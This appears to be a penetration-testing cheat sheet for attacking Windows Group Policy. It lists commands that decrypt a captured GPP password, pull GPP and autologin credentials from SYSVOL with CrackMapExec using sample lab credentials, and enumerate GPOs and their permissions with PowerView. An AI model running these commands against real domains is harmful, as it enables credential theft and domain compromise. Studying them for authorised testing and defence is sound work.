Group Policy Enumeration & Attacks
This section covers various techniques used to enumerate and exploit Group Policy Objects (GPOs) within a Windows domain environment.
1. Decrypt Group Policy Preference Password
Command:
gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaEDescription: Tool used to decrypt a captured Group Policy Preference (GPP) password from a Linux-based host.
2. Locate Group Policy Preference Credentials
Command:
crackmapexec smb -L | grep gppDescription: Locates and retrieves a Group Policy Preference password using CrackMapExec, then filters the output using grep. Performed from a Linux-based host.
Command:
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologinDescription: Locates and retrieves any credentials stored in the SYSVOL share of a Windows target using CrackMapExec. Performed from a Linux-based host.
3. Enumerate Group Policy Objects (GPOs)
Command:
Get-DomainGPO | select displaynameDescription: PowerView tool used to enumerate GPO names in a target Windows domain. Performed from a Windows-based host.
Command:
Get-GPO -All | Select DisplayNameDescription: PowerShell command used to enumerate all GPO names. Performed from a Windows-based host.
4. Check Permissions on GPOs
Command:
$sid=Convert-NameToSid "Domain Users"Description: Creates a variable
$sidthat stores the SID of the "Domain Users" group. Performed from a Windows-based host.
Command:
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}Description: PowerView tool used to check if "Domain Users" have any rights over GPOs. Performed from a Windows-based host.
5. Retrieve GPO Details Using GUID
Command:
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532Description: Retrieves detailed information about a GPO using its GUID. Performed from a Windows-based host.
Last updated